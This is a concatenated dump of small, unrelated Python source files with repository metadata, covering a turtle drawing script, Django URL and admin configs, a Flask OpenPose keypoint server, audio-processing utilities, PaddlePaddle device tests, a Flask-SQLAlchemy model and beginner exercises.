|
5cab82c491cf1fee60b9d184422b03d78cfa699e
|
[] |
no_license
|
beingveera/whole-python
|
524441eec44379c36cb1cfeccdbc65bf1c15d2f6
|
3f2b3cb7528afb9605ab6f9d4d2efc856a247af5
|
refs/heads/main
| 2023-05-15T06:28:03.058105
| 2021-06-05T09:37:47
| 2021-06-05T09:37:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
import turtle as t
t.fd(1000)
t.setposition(200,-490)
t.clear()
t.speed(0.1)
t.circle(-50)
t.tracer(1,3)
t.color('blue')
t.pensize(10)
t.circle(20)
|
[
"sharma.lokesh.222001@gmail.com"
] |
sharma.lokesh.222001@gmail.com
|
dcec9dfe44d580ff70c968b38dcb5e9e06fac39d
|
eb57e632fb351db1975ad0e15bd480759bbc153b
|
/sysinf/urls.py
|
3c44a5f757052a14c4ca9c32626da21663101d8a
|
[
"MIT"
] |
permissive
|
raikel/dnfas
|
163ebc59fc6d4a12c044de33136cdce7ed7ddf0e
|
567bcc6656c75ee5167bd248045ec24e37de07b8
|
refs/heads/master
| 2021-06-27T02:22:30.508109
| 2020-03-25T20:11:04
| 2020-03-25T20:11:04
| 224,517,088
| 0
| 0
|
MIT
| 2021-03-19T22:52:15
| 2019-11-27T21:07:07
|
Python
|
UTF-8
|
Python
| false
| false
| 167
|
py
|
from django.urls import path
from .views import SystemStatsView
app_name = 'sysinf'
urlpatterns = [
path('system/', SystemStatsView.as_view(), name='system')
]
|
[
"raikelbl@gmail.com"
] |
raikelbl@gmail.com
|
8348e16c6785697fe7de5e82d5b2cccf17d8a39d
|
56231e5b77a8b743e84e43d28691da36b89a0cca
|
/platform-tools/systrace/catapult/telemetry/telemetry/testing/run_tests_unittest.py
|
8728813fb8ee52fb77629c0039869526582c60cf
|
[
"MIT",
"LicenseRef-scancode-proprietary-license",
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
cricketclubucd/davisdragons
|
ee3aa6ad72197c2218660843e03d58c562b965aa
|
99d5877377b80d1b20c78cc3c4c6f26795f29b14
|
refs/heads/master
| 2023-01-30T05:37:45.923195
| 2021-01-27T06:30:25
| 2021-01-27T06:30:25
| 96,661,120
| 2
| 2
|
MIT
| 2023-01-23T18:42:26
| 2017-07-09T04:32:10
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,762
|
py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry.core import util
from telemetry.testing import run_tests
class MockArgs(object):
def __init__(self):
self.positional_args = []
self.exact_test_filter = True
self.run_disabled_tests = False
self.skip = []
class MockPossibleBrowser(object):
def __init__(self, browser_type, os_name, os_version_name,
supports_tab_control):
self.browser_type = browser_type
self.platform = MockPlatform(os_name, os_version_name)
self.supports_tab_control = supports_tab_control
class MockPlatform(object):
def __init__(self, os_name, os_version_name):
self.os_name = os_name
self.os_version_name = os_version_name
def GetOSName(self):
return self.os_name
def GetOSVersionName(self):
return self.os_version_name
class RunTestsUnitTest(unittest.TestCase):
def _GetEnabledTests(self, browser_type, os_name, os_version_name,
supports_tab_control, args=None):
if not args:
args = MockArgs()
runner = run_tests.typ.Runner()
host = runner.host
runner.top_level_dir = util.GetTelemetryDir()
runner.args.tests = [host.join(util.GetTelemetryDir(),
'telemetry', 'testing', 'disabled_cases.py')]
possible_browser = MockPossibleBrowser(
browser_type, os_name, os_version_name, supports_tab_control)
runner.classifier = run_tests.GetClassifier(args, possible_browser)
_, test_set = runner.find_tests(runner.args)
return set(test.name.split('.')[-1] for test in test_set.parallel_tests)
def testSystemMacMavericks(self):
self.assertEquals(
set(['testAllEnabled',
'testMacOnly',
'testMavericksOnly',
'testNoChromeOS',
'testNoWinLinux',
'testSystemOnly',
'testHasTabs']),
self._GetEnabledTests('system', 'mac', 'mavericks', True))
def testSystemMacLion(self):
self.assertEquals(
set(['testAllEnabled',
'testMacOnly',
'testNoChromeOS',
'testNoMavericks',
'testNoWinLinux',
'testSystemOnly',
'testHasTabs']),
self._GetEnabledTests('system', 'mac', 'lion', True))
def testCrosGuestChromeOS(self):
self.assertEquals(
set(['testAllEnabled',
'testChromeOSOnly',
'testNoMac',
'testNoMavericks',
'testNoSystem',
'testNoWinLinux',
'testHasTabs']),
self._GetEnabledTests('cros-guest', 'chromeos', '', True))
def testCanaryWindowsWin7(self):
self.assertEquals(
set(['testAllEnabled',
'testNoChromeOS',
'testNoMac',
'testNoMavericks',
'testNoSystem',
'testWinOrLinuxOnly',
'testHasTabs']),
self._GetEnabledTests('canary', 'win', 'win7', True))
def testDoesntHaveTabs(self):
self.assertEquals(
set(['testAllEnabled',
'testNoChromeOS',
'testNoMac',
'testNoMavericks',
'testNoSystem',
'testWinOrLinuxOnly']),
self._GetEnabledTests('canary', 'win', 'win7', False))
def testSkip(self):
args = MockArgs()
args.skip = ['telemetry.*testNoMac', '*NoMavericks',
'telemetry.testing.disabled_cases.DisabledCases.testNoSystem']
self.assertEquals(
set(['testAllEnabled',
'testNoChromeOS',
'testWinOrLinuxOnly',
'testHasTabs']),
self._GetEnabledTests('canary', 'win', 'win7', True, args))
|
[
"jena.suraj.k@gmail.com"
] |
jena.suraj.k@gmail.com
|
bb1db72e1417f503a51c53cab45015887b5df63a
|
8ba041911be24ba453d6df60ddf47e7d2aedfde5
|
/model.py
|
ff354766fccfa1efd6fe85425ef183d0be6f6c83
|
[] |
no_license
|
dmcdekker/testing-1
|
9c0beda3fbdb9d37a812e903800f4c976cd0bbae
|
ee6cbab6aec40adde9971005d9c79862fb3bfe7a
|
refs/heads/master
| 2020-03-15T14:07:38.046358
| 2018-05-04T19:58:29
| 2018-05-04T19:58:29
| 132,183,530
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 935
|
py
|
from flask.ext.sqlalchemy import SQLAlchemy
db = SQLAlchemy()
class Game(db.Model):
"""Board game."""
__tablename__ = "games"
game_id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(20), nullable=False, unique=True)
description = db.Column(db.String(100))
def connect_to_db(app, db_uri="postgresql:///games"):
app.config['SQLALCHEMY_DATABASE_URI'] = db_uri
db.app = app
db.init_app(app)
def example_data():
"""Create example data for the test database."""
#FIXME: write a function that creates a game and adds it to the database.
game1 = Game(name="My Little Pony", description="A pony game")
game2 = Game(name="Good or Evil", description="Are you good or evil?!")
db.session.add_all([game1, game2])
db.session.commit()
if __name__ == '__main__':
from server import app
connect_to_db(app)
print "Connected to DB."
|
[
"no-reply@hackbrightacademy.com"
] |
no-reply@hackbrightacademy.com
|
0b1cde1c5f80af4837b8282ef80c77174dc1c5e7
|
12f18662719d04d2404396b9059b60525528f557
|
/findsportsordermanagement-master/purchaseorder/migrations/0018_purchaseorder_internal_notes.py
|
45c5291a9d14c87910376425849d88f1c857c904
|
[] |
no_license
|
ujjalgoswami/ordermanagementcustomdashboard
|
0bf4a5770d1913b257a43858d778e630e671a342
|
acd18510b0934601d30bd717ea4b3fbb61ecfb5c
|
refs/heads/master
| 2021-02-04T10:04:27.380674
| 2020-02-28T01:37:35
| 2020-02-28T01:37:35
| 243,653,613
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 400
|
py
|
# Generated by Django 2.2.4 on 2019-12-10 15:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('purchaseorder', '0017_orderline_reorder'),
]
operations = [
migrations.AddField(
model_name='purchaseorder',
name='internal_notes',
field=models.TextField(null=True),
),
]
|
[
"ujjalgoswami92@gmail.com"
] |
ujjalgoswami92@gmail.com
|
667a27f91a5feffa45b0df3b9f4c79d54a94be94
|
af93b3909f86ab2d310a8fa81c9357d87fdd8a64
|
/begginer/5. cas/zadatak5.py
|
f27bd47d532b65caf07d06877073feb078f9bbcb
|
[] |
no_license
|
BiljanaPavlovic/pajton-kurs
|
8cf15d443c9cca38f627e44d764106ef0cc5cd98
|
93092e6e945b33116ca65796570462edccfcbcb0
|
refs/heads/master
| 2021-05-24T14:09:57.536994
| 2020-08-02T15:00:12
| 2020-08-02T15:00:12
| 253,597,402
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 199
|
py
|
unos=input("Unesite stranice a i b:")
stranice=unos.split(" ")
obim=2*float(stranice[0])+2*float(stranice[1])
povrsina=float(stranice[0])*float(stranice[1])
print("O= ",obim)
print("P=",povrsina)
|
[
"zabiljanupavlovic@gmail.com"
] |
zabiljanupavlovic@gmail.com
|
99e4e4ca7bb40a4fc37e65d4d6c65b0a7d078685
|
b9d75e3e37d08262321b0dc726639fc25f152caa
|
/utils.py
|
cc49eb7b6a45ee027cefe48ead6e43e9a20dab51
|
[] |
no_license
|
G-Wang/pytorch_FFTNet
|
a2712763ae7ee2fff9d002c931593987d6e25060
|
b96486f6823e762e71c2e299739b925081e5bacf
|
refs/heads/master
| 2020-04-08T22:14:18.563719
| 2018-08-31T07:38:21
| 2018-08-31T07:38:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,463
|
py
|
import numpy as np
import torch
from torch.nn import functional as F
from scipy.special import expn
from torchaudio.transforms import MuLawEncoding, MuLawExpanding
def encoder(quantization_channels):
return MuLawEncoding(quantization_channels)
def decoder(quantization_channels):
return MuLawExpanding(quantization_channels)
def np_mulaw(x, quantization_channels):
mu = quantization_channels - 1
x_mu = np.sign(x) * np.log1p(mu * np.abs(x)) / np.log1p(mu)
return x_mu
def np_inv_mulaw(x, quantization_channels):
mu = quantization_channels - 1
x = np.sign(x) * (np.exp(np.abs(x) * np.log1p(mu)) - 1.) / mu
return x
def float2class(x, classes):
mu = classes - 1
return np.rint((x + 1) / 2 * mu).astype(int)
def class2float(x, classes):
mu = classes - 1
return x.astype(float) / mu * 2 - 1.
def zero_padding(x, maxlen, dim=0):
diff = maxlen - x.shape[dim]
if diff <= 0:
return x
else:
pad_shape = ()
for i in range(len(x.shape)):
if i != dim:
pad_shape += ((0, 0),)
else:
pad_shape += ((0, diff),)
return np.pad(x, pad_shape, 'constant')
def repeat_last_padding(x, maxlen):
diff = maxlen - x.shape[-1]
if diff <= 0:
return x
else:
pad_value = np.tile(x[..., [-1]], diff)
return np.concatenate((x, pad_value), axis=-1)
# this function is copied from https://github.com/braindead/logmmse/blob/master/logmmse.py
# change numpy to tensor
def logmmse(x, sr, noise_std=1 / 256):
window_size = int(0.02 * sr)
if window_size % 2 == 1:
window_size += 1
# noverlap = len1; hop_size = len2; window_size = len
noverlap = int(window_size * 0.75)
hop_size = window_size - noverlap
win = torch.hann_window(window_size)
win *= hop_size / win.sum()
nfft = 2 ** (window_size - 1).bit_length()
pad_pos = (nfft - window_size) // 2
noise = torch.randn(6, window_size) * noise_std
noise_fft = torch.rfft(F.pad(win * noise, (pad_pos, pad_pos)), 1)
noise_mean = noise_fft.pow(2).sum(-1).sqrt()
noise_mu = noise_mean.mean(0)
noise_mu2 = noise_mu.pow(2)
spec = torch.stft(x, nfft, hop_length=hop_size, win_length=window_size, window=win, center=False)
spec_copy = spec.clone()
sig2 = spec.pow(2).sum(-1)
vad_curve = vad(x, S=spec).float()
aa = 0.98
ksi_min = 10 ** (-25 / 10)
gammak = torch.min(sig2 / noise_mu2.unsqueeze(-1), torch.Tensor([40]))
for n in range(spec.size(1)):
gammak_n = gammak[:, n]
if n == 0:
ksi = aa + (1 - aa) * F.relu(gammak_n - 1)
else:
ksi = aa * spec_copy[:, n - 1].pow(2).sum(-1) / noise_mu2 + (1 - aa) * F.relu(gammak_n - 1)
ksi = torch.max(ksi, torch.Tensor([ksi_min]))
A = ksi / (1 + ksi)
vk = A * gammak_n
ei_vk = 0.5 * expint(vk)
hw = A * ei_vk.exp()
spec_copy[:, n] *= hw.unsqueeze(-1)
xi_w = torch.irfft(spec_copy.transpose(0, 1), 1, signal_sizes=torch.Size([nfft]))[:, pad_pos:-pad_pos]
origin = torch.irfft(spec.transpose(0, 1), 1, signal_sizes=torch.Size([nfft]))[:, pad_pos:-pad_pos]
xi_w_mask = vad_curve / 2 + 0.5
orign_mask = (1 - vad_curve) / 2
final_framed = xi_w * xi_w_mask.unsqueeze(-1) + origin * orign_mask.unsqueeze(-1)
xfinal = torch.zeros(final_framed.size(0) * hop_size + noverlap)
k = 0
for n in range(final_framed.size(0)):
xfinal[k:k + window_size] += final_framed[n]
k += hop_size
return xfinal
def expint(x):
x = x.detach().cpu().numpy()
x = expn(1, x)
return torch.from_numpy(x).float()
def vad(x, hop_size=256, S=None, k=5, med_num=9):
if S is None:
S = torch.stft(x, hop_size * 4, hop_length=hop_size)
energy = S.pow(2).sum(-1).mean(0).sqrt()
energy /= energy.max()
sorted_E, _ = energy.sort()
sorted_E_d = sorted_E[2:] - sorted_E[:-2]
smoothed = F.pad(sorted_E_d, (7, 7)).unfold(0, 15, 1).mean(-1)
sorted_E_d_peak = F.relu(smoothed[1:-1] - smoothed[:-2]) * F.relu(smoothed[1:-1] - smoothed[2:])
first, *dummy = torch.nonzero(sorted_E_d_peak) + 2
E_th = sorted_E[:first].mean() * k
decision = torch.gt(energy, E_th)
pad = (med_num // 2, med_num // 2)
decision = F.pad(decision, pad)
decision = decision.unfold(0, med_num, 1)
decision, _ = decision.median(dim=-1)
return decision
|
[
"ya70201@gmail.com"
] |
ya70201@gmail.com
|
7943c82bfb5eef6a125f551f9bf92c8ed87f9028
|
7da0e8d03548ec83ec717a076add2199e543e3dd
|
/InvenTree/part/urls.py
|
75d5041b9c89cb54a2d092a2a95eaf92b5418bb4
|
[
"MIT"
] |
permissive
|
Devarshi87/InvenTree
|
7b90cbf14699861436ab127b9b7638cee81e30c4
|
2191b7f71972d4c3ba7322cc93936801a168ab3c
|
refs/heads/master
| 2020-05-15T04:25:03.289794
| 2019-04-18T12:42:36
| 2019-04-18T12:42:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,522
|
py
|
from django.conf.urls import url, include
from . import views
supplier_part_detail_urls = [
url(r'edit/?', views.SupplierPartEdit.as_view(), name='supplier-part-edit'),
url(r'delete/?', views.SupplierPartDelete.as_view(), name='supplier-part-delete'),
url('^.*$', views.SupplierPartDetail.as_view(), name='supplier-part-detail'),
]
supplier_part_urls = [
url(r'^new/?', views.SupplierPartCreate.as_view(), name='supplier-part-create'),
url(r'^(?P<pk>\d+)/', include(supplier_part_detail_urls)),
]
part_detail_urls = [
url(r'^edit/?', views.PartEdit.as_view(), name='part-edit'),
url(r'^delete/?', views.PartDelete.as_view(), name='part-delete'),
url(r'^track/?', views.PartDetail.as_view(template_name='part/track.html'), name='part-track'),
url(r'^bom-export/?', views.BomDownload.as_view(), name='bom-export'),
url(r'^bom/?', views.PartDetail.as_view(template_name='part/bom.html'), name='part-bom'),
url(r'^build/?', views.PartDetail.as_view(template_name='part/build.html'), name='part-build'),
url(r'^stock/?', views.PartDetail.as_view(template_name='part/stock.html'), name='part-stock'),
url(r'^used/?', views.PartDetail.as_view(template_name='part/used_in.html'), name='part-used-in'),
url(r'^allocation/?', views.PartDetail.as_view(template_name='part/allocation.html'), name='part-allocation'),
url(r'^suppliers/?', views.PartDetail.as_view(template_name='part/supplier.html'), name='part-suppliers'),
url(r'^thumbnail/?', views.PartImage.as_view(), name='part-image'),
# Any other URLs go to the part detail page
url(r'^.*$', views.PartDetail.as_view(), name='part-detail'),
]
part_category_urls = [
url(r'^edit/?', views.CategoryEdit.as_view(), name='category-edit'),
url(r'^delete/?', views.CategoryDelete.as_view(), name='category-delete'),
url('^.*$', views.CategoryDetail.as_view(), name='category-detail'),
]
part_bom_urls = [
url(r'^edit/?', views.BomItemEdit.as_view(), name='bom-item-edit'),
url('^delete/?', views.BomItemDelete.as_view(), name='bom-item-delete'),
url(r'^.*$', views.BomItemDetail.as_view(), name='bom-item-detail'),
]
# URL list for part web interface
part_urls = [
# Create a new category
url(r'^category/new/?', views.CategoryCreate.as_view(), name='category-create'),
# Create a new part
url(r'^new/?', views.PartCreate.as_view(), name='part-create'),
# Create a new BOM item
url(r'^bom/new/?', views.BomItemCreate.as_view(), name='bom-item-create'),
# Individual part
url(r'^(?P<pk>\d+)/', include(part_detail_urls)),
# Part category
url(r'^category/(?P<pk>\d+)/', include(part_category_urls)),
url(r'^bom/(?P<pk>\d+)/', include(part_bom_urls)),
# Top level part list (display top level parts and categories)
url(r'^.*$', views.PartIndex.as_view(), name='part-index'),
]
"""
part_param_urls = [
# Detail of a single part parameter
url(r'^(?P<pk>[0-9]+)/?$', views.PartParamDetail.as_view(), name='partparameter-detail'),
# Parameters associated with a particular part
url(r'^\?.*/?$', views.PartParamList.as_view()),
url(r'^$', views.PartParamList.as_view()),
]
part_param_template_urls = [
# Detail of a single part field template
url(r'^(?P<pk>[0-9]+)/?$', views.PartTemplateDetail.as_view(), name='partparametertemplate-detail'),
# List all part field templates
url(r'^\?.*/?$', views.PartTemplateList.as_view()),
url(r'^$', views.PartTemplateList.as_view())
]
"""
|
[
"oliver.henry.walters@gmail.com"
] |
oliver.henry.walters@gmail.com
|
48fdd9fa5aba23d7bfbf4bd119d4bcc4a83a85a2
|
35d62f3ccf1c422b13b313c4e519a5ce335e934d
|
/leetcode/jewelsAndStones.py
|
cc1e31157da05da0b2095b9c498ceeb4b90ee203
|
[] |
no_license
|
malaybiswal/python
|
357a074889299effe6a5fa2f1cd9c50ca35652d0
|
684d24d719b785725e736671faf2681232ecc394
|
refs/heads/master
| 2020-05-17T22:25:43.043929
| 2019-05-08T23:41:19
| 2019-05-08T23:41:19
| 183,999,871
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 223
|
py
|
#https://leetcode.com/problems/jewels-and-stones/
def numJewelsInStones(J, S):
c=0
for x in J:
for y in S:
if(x==y):
c+=1
return c
x="zz"
y="ZZZ"
print(numJewelsInStones(x,y))
|
[
"malay.biswal@rackspace.com"
] |
malay.biswal@rackspace.com
|
516e7adfdc21f38790c5bfe5706d14864c96eaab
|
3cd8bdcda9d0e549df184a5d9085ed8f5a86145d
|
/defining_classes/to_do_list/project/task.py
|
ad5910ea22a5b8855a43873b237cf5c1d554e494
|
[] |
no_license
|
ivklisurova/SoftUni_Python_OOP
|
bbec8a5d0d8c2c3f536dd2a92e9187aa39121692
|
59e2080b4eb0826a62a020ea3368a0bac6f644be
|
refs/heads/master
| 2022-11-29T00:09:40.488544
| 2020-08-05T19:55:27
| 2020-08-05T19:55:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 962
|
py
|
class Task:
def __init__(self, name, due_date):
self.name = name
self.due_date = due_date
self.comments = []
self.completed = False
def change_name(self, new_name: str):
if new_name == self.name:
return 'Name cannot be the same.'
self.name = new_name
return self.name
def change_due_date(self, new_date: str):
if new_date == self.due_date:
return 'Date cannot be the same.'
self.due_date = new_date
return self.due_date
def add_comment(self, comment: str):
self.comments.append(comment)
def edit_comment(self, comment_number: int, new_comment: str):
if comment_number >= len(self.comments):
return 'Cannot find comment.'
self.comments[comment_number] = new_comment
return f'{", ".join(self.comments)}'
def details(self):
return f'Name: {self.name} - Due Date: {self.due_date}'
|
[
"55747390+ivklisurova@users.noreply.github.com"
] |
55747390+ivklisurova@users.noreply.github.com
|
e7b3c28e67c42c208b0778ca9b4afdfddfd18a79
|
706518f154812af56f8fc91a71cd65d9667d9ed0
|
/python/paddle/fluid/tests/unittests/test_device.py
|
08697a080445e606f17bdde83384eef391713721
|
[
"Apache-2.0"
] |
permissive
|
andreazanetti/Paddle
|
3ea464703d67963134ffc6828f364412adb03fce
|
a259076dd01801e2e619237da02235a4856a96bb
|
refs/heads/develop
| 2023-04-25T08:30:43.751734
| 2021-05-05T01:31:44
| 2021-05-05T01:31:44
| 263,870,069
| 0
| 2
|
Apache-2.0
| 2020-07-07T10:45:08
| 2020-05-14T09:22:07
| null |
UTF-8
|
Python
| false
| false
| 3,379
|
py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import paddle
import paddle.fluid as fluid
import paddle.fluid.core as core
import paddle.fluid.framework as framework
class TestStaticDeviceManage(unittest.TestCase):
def _test_device(self, device_name, device_class):
paddle.set_device(device_name)
out1 = paddle.zeros(shape=[1, 3], dtype='float32')
out2 = paddle.ones(shape=[1, 3], dtype='float32')
out3 = paddle.concat(x=[out1, out2], axis=0)
exe = paddle.static.Executor()
exe.run(paddle.fluid.default_startup_program())
res = exe.run(fetch_list=[out3])
device = paddle.get_device()
self.assertEqual(isinstance(exe.place, device_class), True)
self.assertEqual(device, device_name)
def test_cpu_device(self):
self._test_device("cpu", core.CPUPlace)
def test_gpu_device(self):
if core.is_compiled_with_cuda():
self._test_device("gpu:0", core.CUDAPlace)
def test_xpu_device(self):
if core.is_compiled_with_xpu():
self._test_device("xpu:0", core.XPUPlace)
class TestImperativeDeviceManage(unittest.TestCase):
def test_cpu(self):
with fluid.dygraph.guard():
paddle.set_device('cpu')
out1 = paddle.zeros(shape=[1, 3], dtype='float32')
out2 = paddle.ones(shape=[1, 3], dtype='float32')
out3 = paddle.concat(x=[out1, out2], axis=0)
device = paddle.get_device()
self.assertEqual(
isinstance(framework._current_expected_place(), core.CPUPlace),
True)
self.assertEqual(device, "cpu")
def test_gpu(self):
if core.is_compiled_with_cuda():
with fluid.dygraph.guard():
paddle.set_device('gpu:0')
out1 = paddle.zeros(shape=[1, 3], dtype='float32')
out2 = paddle.ones(shape=[1, 3], dtype='float32')
out3 = paddle.concat(x=[out1, out2], axis=0)
device = paddle.get_device()
self.assertEqual(
isinstance(framework._current_expected_place(),
core.CUDAPlace), True)
self.assertEqual(device, "gpu:0")
def test_xpu(self):
if core.is_compiled_with_xpu():
with fluid.dygraph.guard():
out = paddle.to_tensor([1, 2])
device = paddle.get_device()
self.assertEqual(
isinstance(framework._current_expected_place(),
core.XPUPlace), True)
self.assertTrue(out.place.is_xpu_place())
self.assertEqual(device, "xpu:0")
if __name__ == '__main__':
unittest.main()
|
[
"noreply@github.com"
] |
andreazanetti.noreply@github.com
|
67056ff3f3511beb22ed46e346b3d52b30d40eed
|
cc1cd104b4b383e7807e75e2fb0a8e84e5fcf7df
|
/api_server/openpose_wrapper/openpose_server/app.py
|
491381120447d9b6e7f8461f4eb89313c620e8c9
|
[] |
no_license
|
Sam1224/OutfitApp-AWS
|
b9884d40945d2076f2135c0d2d75cf938161af9f
|
6c1b4d1e5c328c5d22b8f055d41a57ec2e9b921e
|
refs/heads/master
| 2022-04-24T11:50:24.506423
| 2020-04-29T11:03:43
| 2020-04-29T11:03:43
| 257,340,558
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,164
|
py
|
# coding=utf-8
import os
import sys
import argparse
import json
from PIL import Image
import cv2
import numpy as np
import itertools
# flask
import flask
#from flask import Flask, render_template, request, jsonify
# openpose python API
sys.path.append('../openpose_gpu/build/python');
from openpose import pyopenpose as op
# 自作モジュール
from utils import conv_base64_to_pillow, conv_base64_to_cv, conv_pillow_to_base64
#======================
# グローバル変数
#======================
app = flask.Flask(__name__)
app.config['JSON_AS_ASCII'] = False # 日本語文字化け対策
app.config["JSON_SORT_KEYS"] = False # ソートをそのまま
OPENPOSE_MODE_DIR_PATH = "../openpose_gpu/models/"
#================================================================
# "http://host_ip:5010" リクエスト送信時の処理
#================================================================
@app.route('/')
def index():
print( "リクエスト受け取り" )
return
#================================================================
# "http://host_ip:5010/openpose" にリクエスト送信時の処理
#================================================================
@app.route('/openpose', methods=['POST'])
def responce():
print( "リクエスト受け取り" )
if( app.debug ):
print( "flask.request.method : ", flask.request.method )
print( "flask.request.headers \n: ", flask.request.headers )
#------------------------------------------
# 送信された json データの取得
#------------------------------------------
if( flask.request.headers["User-Agent"].split("/")[0] in "python-requests" ):
json_data = json.loads(flask.request.json)
else:
json_data = flask.request.get_json()
#------------------------------------------
# 送信された画像データの変換
#------------------------------------------
pose_img_cv = conv_base64_to_cv( json_data["pose_img_base64"] )
if( app.debug ):
cv2.imwrite( "tmp/pose_img.png", pose_img_cv )
#------------------------------------------
# OpenPose Python-API の実行
# 参考 : openpose_gpu/build/examples/tutorial_api_python/01_body_from_image.py
#------------------------------------------
# パラメーターの設定
params = dict()
params["model_folder"] = OPENPOSE_MODE_DIR_PATH
params["face"] = True
params["hand"] = True
# OpenPose Python-API
opWrapper = op.WrapperPython()
opWrapper.configure(params)
opWrapper.start()
# Process Image
datum = op.Datum()
datum.cvInputData = pose_img_cv
opWrapper.emplaceAndPop([datum])
# keypoints の取得
pose_keypoints_2d = np.delete( datum.poseKeypoints, [8, 19, 20, 21, 22, 23, 24], axis=1).reshape(-1).tolist()
face_keypoints_2d = datum.faceKeypoints.reshape(-1).tolist()
pose_keypoints_3d = datum.poseKeypoints3D.tolist()
face_keypoints_3d = datum.faceKeypoints3D.tolist()
left_hand_keypoints_2d = datum.handKeypoints[0].reshape(-1).tolist()
right_hand_keypoints_2d = datum.handKeypoints[1].reshape(-1).tolist()
hand_left_keypoints_3d = datum.handKeypoints3D[0].tolist()
hand_right_keypoints_3d = datum.handKeypoints3D[1].tolist()
"""
if( args.debug ):
print("pose_keypoints_2d : ", pose_keypoints_2d )
#print("pose_keypoints_2d[0][0] : ", pose_keypoints_2d[0][0] )
#print("face_keypoints_2d: ", face_keypoints_2d )
#print("pose_keypoints_3d: ", pose_keypoints_3d )
#print("datum.cvOutputData: ", datum.cvOutputData )
"""
#------------------------------------------
# レスポンスメッセージの設定
#------------------------------------------
http_status_code = 200
response = flask.jsonify(
{
"version" : 1.3,
"people" : [
{
"pose_keypoints_2d" : pose_keypoints_2d,
"face_keypoints_2d" : face_keypoints_2d,
"hand_left_keypoints_2d" : left_hand_keypoints_2d,
"hand_right_keypoints_2d" : right_hand_keypoints_2d,
"pose_keypoints_3d" : pose_keypoints_3d,
"face_keypoints_3d" : face_keypoints_3d,
"hand_left_keypoints_3d" : hand_left_keypoints_3d,
"hand_right_keypoints_3d" : hand_right_keypoints_3d,
}
]
}
)
# レスポンスメッセージにヘッダーを付与(Access-Control-Allow-Origin エラー対策)
#response.headers.add('Access-Control-Allow-Origin', '*')
#response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')
#response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')
if( app.debug ):
print( "response.headers : \n", response.headers )
return response, http_status_code
if __name__ == "__main__":
parser = argparse.ArgumentParser()
#parser.add_argument('--host', type=str, default="localhost", help="ホスト名(コンテナ名 or コンテナ ID)")
#parser.add_argument('--host', type=str, default="openpose_ubuntu_gpu_container", help="ホスト名(コンテナ名 or コンテナ ID)")
parser.add_argument('--host', type=str, default="0.0.0.0", help="ホスト名(コンテナ名 or コンテナ ID)")
parser.add_argument('--port', type=str, default="5010", help="ポート番号")
parser.add_argument('--enable_threaded', action='store_true', help="並列処理有効化")
parser.add_argument('--debug', action='store_true', help="デバッグモード有効化")
args = parser.parse_args()
if( args.debug ):
for key, value in vars(args).items():
print('%s: %s' % (str(key), str(value)))
if not os.path.exists("tmp"):
os.mkdir("tmp")
if( args.debug ):
app.debug = True
else:
app.debug = False
if( args.enable_threaded ):
app.run( host=args.host, port=args.port, threaded=False )
else:
app.run( host=args.host, port=args.port, threaded=True )
|
[
"y034112@gmail.com"
] |
y034112@gmail.com
|
920d2263cbeb1e5be4d7cfac31f5ccec2fafdc5a
|
1f0831db24ae2772d4944faf05289599bb37aca7
|
/data_crawling/08/api/setup.py
|
4d6fe9c915145a8327f8ea7ba8e946c9660fc6d8
|
[] |
no_license
|
smaystr/rails_reactor
|
2123f39ae97f38acb647363979fe4a09b896670e
|
69c8aac5860527768b4a8b7bce027b9dea6b1989
|
refs/heads/master
| 2022-08-19T05:35:21.535933
| 2019-08-28T12:46:22
| 2019-08-28T12:46:22
| 189,264,026
| 1
| 0
| null | 2022-07-29T22:34:56
| 2019-05-29T16:47:08
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 660
|
py
|
from setuptools import setup
with open('requirements.txt') as f:
requirements = f.read().splitlines()
setup(
name="sergey_milantiev_crawler_master",
version="0.0.0",
install_requires=requirements,
packages=["app"],
author="sergey.milantiev@gmail.com",
url="",
download_url="",
description="CRAWLER DOMRIA API",
long_description="",
license="MIT",
keywords="",
classifiers=[
"Intended Audience :: Developers",
"Programming Language :: Python",
"Natural Language :: English",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.7",
],
)
|
[
"smaystr@gmail.com"
] |
smaystr@gmail.com
|
881b2796e754eccb435d9f1824561012eb3f9263
|
8308fa0e5f998e0aa6741af5720d6da99497060d
|
/estoque/admin.py
|
deb9bd5b8513f6c1109d2812a086ec45998d55fe
|
[] |
no_license
|
gbpjr/sistema-estoque
|
7aae11c657c555b98a329cdafde704504ef8b23a
|
701471e593fa758a1da1b66fa279da4dd3d979e7
|
refs/heads/master
| 2020-04-23T08:37:35.123431
| 2019-02-24T21:43:14
| 2019-02-24T21:43:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 207
|
py
|
from django.contrib import admin
from .models import Local, Tipo, Fabricante, Componente
admin.site.register(Local)
admin.site.register(Tipo)
admin.site.register(Fabricante)
admin.site.register(Componente)
|
[
"="
] |
=
|
eadbd701bc7fafb29b726f2330b241a74aad34d8
|
